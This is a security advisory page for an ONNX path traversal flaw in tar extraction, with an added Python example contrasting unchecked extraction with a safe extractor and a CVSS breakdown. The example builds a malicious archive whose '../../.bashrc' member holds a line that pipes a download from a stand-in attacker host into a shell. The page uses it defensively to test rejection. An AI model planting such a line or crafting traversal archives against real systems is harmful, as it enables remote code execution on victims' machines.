Path Traversal Vulnerability in ONNX Framework Affects File Security
CVE-2024-7776
9.1 CRITICAL
What is CVE-2024-7776?
A path traversal weakness exists in the download_model function of the ONNX framework (onnx/onnx), affecting version 1.16.1 and earlier. download_model fetches a model as a tar archive and extracts it, but the member paths inside the archive are not validated before they are joined to the extraction directory. An archive containing entries such as ../../<file> is therefore written outside the intended directory, so an attacker who can supply the archive can overwrite arbitrary files writable by the user running the extraction. Because the overwritten file may be one that is later executed or loaded (a shell profile, a script, a configuration file), the overwrite can escalate to remote code execution, which is why the issue is rated critical.
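The core of the bug is that tar member names are trusted when computing the destination path. The following Python is an added example, not code from the ONNX project: it builds a constructed malicious archive in memory, shows where an unchecked extraction would write each member, and contrasts that with an extractor that resolves every member path and refuses any that leaves the destination directory. All names here (build_tar, MALICIOUS_TAR, escapes_directory, resolved_targets, safe_extract, check_archives) are this example's own, and the archive contents are made up.

```python
import io
import os
import tarfile
import tempfile


def build_tar(members):
    """Build an in-memory tar from {member_name: bytes}; names are written verbatim."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in members.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed sample archives (not real ONNX model archives). The second member
# of MALICIOUS_TAR uses the traversal pattern the advisory describes.
BENIGN_TAR = build_tar({"model/model.onnx": b"onnx-bytes"})
MALICIOUS_TAR = build_tar({
    "model/model.onnx": b"onnx-bytes",
    "../../.bashrc": b"curl http://attacker.invalid/x | sh\n",
})


def escapes_directory(dest, member_name):
    """True if dest/member_name normalizes to a path outside dest."""
    dest_real = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(dest_real, member_name))
    return os.path.commonpath([dest_real, target]) != dest_real


def resolved_targets(tar_bytes, dest):
    """Where an unchecked extractall() would write each member (computed only, nothing is written)."""
    dest_real = os.path.realpath(dest)
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        return {m.name: os.path.realpath(os.path.join(dest_real, m.name)) for m in tar.getmembers()}


def safe_extract(tar_bytes, dest):
    """Extract only regular files and directories whose resolved path stays under dest.

    Raises ValueError on the first offending member, before it is written. Members
    earlier in the archive may already be on disk; for all-or-nothing semantics,
    extract into a fresh temporary directory and rename it into place on success.
    """
    dest_real = os.path.realpath(dest)
    os.makedirs(dest_real, exist_ok=True)
    # Interpreters with PEP 706 (3.12+, plus security backports to 3.8-3.11) also
    # offer tarfile's built-in 'data' filter; use it when present, but keep our own
    # check so behaviour is the same on interpreters that lack it.
    extract_kwargs = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
    written = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        for member in tar.getmembers():
            if os.path.isabs(member.name) or escapes_directory(dest_real, member.name):
                raise ValueError(f"refusing member that leaves the destination: {member.name!r}")
            # Symlinks, hard links and device nodes are rejected outright: a link
            # written first and a file extracted through it later is the classic
            # way around a name-only check.
            if not (member.isfile() or member.isdir()):
                raise ValueError(f"refusing non-regular member: {member.name!r}")
            tar.extract(member, path=dest_real, **extract_kwargs)
            written.append(member.name)
    return written


def check_archives():
    """Run both sample archives through safe_extract in a scratch directory and report outcomes."""
    with tempfile.TemporaryDirectory() as dest:
        try:
            safe_extract(MALICIOUS_TAR, dest)
            malicious_rejected = False
        except ValueError:
            malicious_rejected = True
        benign_written = safe_extract(BENIGN_TAR, dest)
    return {"malicious_rejected": malicious_rejected, "benign_written": benign_written}


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as scratch:
        for name, path in resolved_targets(MALICIOUS_TAR, scratch).items():
            verdict = "ESCAPES" if escapes_directory(scratch, name) else "ok"
            print(f"{name:<20} -> {path}  [{verdict}]")
    print(check_archives())
```

Two points worth keeping in mind when applying this to a real downloader: the check must run on the resolved path of every member, not on a substring test for "..", because "model/../model/x" is harmless while "model/../../x" is not; and link-type members need to be rejected or validated separately, since a symlink member pointing outside the directory followed by a regular member extracted through it defeats a check that only looks at member names. On Python builds that have it, passing filter="data" to extract() or extractall() performs these checks for you.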
Affected Version(s)
onnx/onnx <= 1.16.1 (range as stated in the description above; the advisory's structured affected-version field is left unspecified)
CVSS V3.1
Score: 9.1
Severity: CRITICAL
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: High
Availability: None
Note: the component metrics listed do not reproduce the score. AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N evaluates to 7.5 (High); a base score of 9.1 requires a second High impact metric alongside Integrity, which is consistent with the file-overwrite-to-code-execution chain in the description. Treat one of the impact fields here as mis-recorded and verify against the source advisory.
CVSS V3.0
Score: 8.1
Severity: HIGH
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Unchanged
Confidentiality: None
Integrity: High
Availability: None
Note: as with the v3.1 entry, these components do not reproduce the score. AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N evaluates to 6.5 (Medium); 8.1 requires a second High impact metric. The two vectors also disagree on User Interaction (None in v3.1, Required in v3.0), so the headline 9.1 assumes the download can be triggered without a user action.